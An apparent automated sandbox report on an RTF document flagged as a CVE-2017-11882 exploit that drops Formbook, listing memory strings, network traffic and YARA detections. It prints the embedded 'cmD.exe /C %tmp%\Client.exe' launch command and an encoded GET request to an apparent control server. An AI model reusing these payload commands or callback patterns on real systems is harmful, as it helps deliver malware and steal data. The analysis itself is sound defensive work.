          Source: explorer.exe, 0000000A.00000000.998739838.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.949886859.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.983940407.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027026563.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com
          Source: explorer.exe, 0000000A.00000000.1005424318.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1030081883.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 0000000A.00000000.1005424318.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1030081883.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: explorer.exe, 0000000A.00000000.1001877731.0000000001DD0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: Client.exe, 00000005.00000002.947458698.0000000002671000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 0000000A.00000000.1008328661.0000000006450000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 0000000A.00000000.1005424318.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1030081883.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 0000000A.00000000.969373511.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 0000000A.00000000.969373511.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 0000000A.00000000.1005424318.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1030081883.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 0000000A.00000000.1001877731.0000000001DD0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 0000000A.00000000.998739838.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.949886859.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.983940407.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027026563.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
          Source: explorer.exe, 0000000A.00000000.969373511.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 0000000A.00000000.1005046507.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 0000000A.00000000.1005424318.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1030081883.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 0000000A.00000000.969373511.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 0000000A.00000000.1005046507.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 0000000A.00000000.976786692.00000000084C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1004626983.0000000002CBF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 0000000A.00000000.978377131.0000000008611000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1010833057.0000000008611000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.993943393.0000000008611000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner1SPS0
          Source: explorer.exe, 0000000A.00000000.1010360758.0000000008521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.995439916.0000000008807000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.979257547.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.950353171.00000000003A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.994846785.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.979787030.000000000880D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.992888492.00000000084D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1011293822.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.993114505.0000000008521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1010156944.00000000084D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.976835880.00000000084D2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 0000000A.00000000.1029291046.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.986329833.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.958357895.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1004626983.0000000002CBF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerq
          Source: explorer.exe, 0000000A.00000000.988586812.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1006236115.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.968187098.0000000004385000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerv
          Source: explorer.exe, 0000000A.00000000.1005046507.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 0000000A.00000000.998739838.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.949886859.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.983940407.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027026563.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
          Source: explorer.exe, 0000000A.00000000.998739838.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.949886859.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.983940407.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027026563.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
          Source: explorer.exe, 0000000A.00000000.998739838.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.949886859.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.983940407.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027026563.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4AB22E69-27EE-49FB-B577-3348055FCC0D}.tmpJump to behavior
          Source: unknownDNS traffic detected: queries for: www.magadirect.co.uk
          Source: global trafficHTTP traffic detected: GET /aekc/?p6A=k0tTOTrAn50YQe1h4ozxDNX4wd5+O6pkKrWAMwmyhhYwJBfC5YpDY/r3FGLgLX7DF3fRHoVtyXQnCSOz0Ea/6qte5rYurCT1UmXBzRE=&xjRt=ZvcPNdzxaTTX6DM HTTP/1.1Host: www.magadirect.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /2014/sqlite-dll-win32-x86-3080700.zip HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.sqlite.orgConnection: Keep-Alive
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEWindow created: window name: CLIPBRDWNDCLASS

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.1039869159.00000000002B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.936147308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.944576873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000000.1155298831.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000000.1152501907.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.1160841001.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.1012237175.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1175159269.0000000000230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.955126906.0000000003696000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.996747059.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1174987416.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.1039727888.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.944868705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.rtf, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
          Source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.1039869159.00000000002B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000002.1039869159.00000000002B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.1039869159.00000000002B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000000.936147308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000000.936147308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000000.936147308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000000.944576873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000000.944576873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000000.944576873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000000.1155298831.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000D.00000000.1155298831.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000000.1155298831.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000000.1152501907.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000D.00000000.1152501907.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000000.1152501907.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.1160841001.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000D.00000002.1160841001.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.1160841001.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.1012237175.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000A.00000000.1012237175.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000000.1012237175.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.1175159269.0000000000230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000B.00000002.1175159269.0000000000230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.1175159269.0000000000230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.955126906.0000000003696000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.955126906.0000000003696000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.955126906.0000000003696000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000000.996747059.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000A.00000000.996747059.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000000.996747059.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.1174987416.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000B.00000002.1174987416.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.1174987416.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.1039727888.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000002.1039727888.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.1039727888.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000000.944868705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000009.00000000.944868705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000000.944868705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: Client.exe PID: 2948, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: notepad.exe PID: 2496, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: NAPSTAT.EXE PID: 204, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmp, type: DROPPEDMatched rule: EXP_potential_CVE_2017_11882 Author: ReversingLabs
          Document contains OLE streams which likely are hidden ActiveX objects
          Source: ~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmp.0.drStream path '_1721465586/\x1Ole10Native' : z....Client.exe.C:\Path\Client.exe.........C:\Path
          Office process drops PE file
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\Client.exeJump to dropped file
          Document contains OLE streams with names of living off the land binaries
          Source: ~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmp.0.drStream path '_1721465588/Equation Native' : ...............\.[.............ZZCmD.exe /C %tmp%\Client.exe A..C................................................................................................................
          PE file has nameless sections
          Source: Client.exe.0.drStatic PE information: section name:
          Found suspicious RTF objects
          Source: Client.exeStatic RTF information: Object: 0 Offset: 0000128Dh Client.exe
          Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.rtf, type: SAMPLEMatched rule: MAL_RTF_Embedded_OLE_PE date = 2018-01-22, author = Florian Roth, description = Detects a suspicious string often used in PE files in a hex encoded object stream, reference = https://www.nextron-systems.com/2018/01/22/creating-yara-rules-detect-embedded-exe-files-ole-objects/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.rtf, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
          Source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
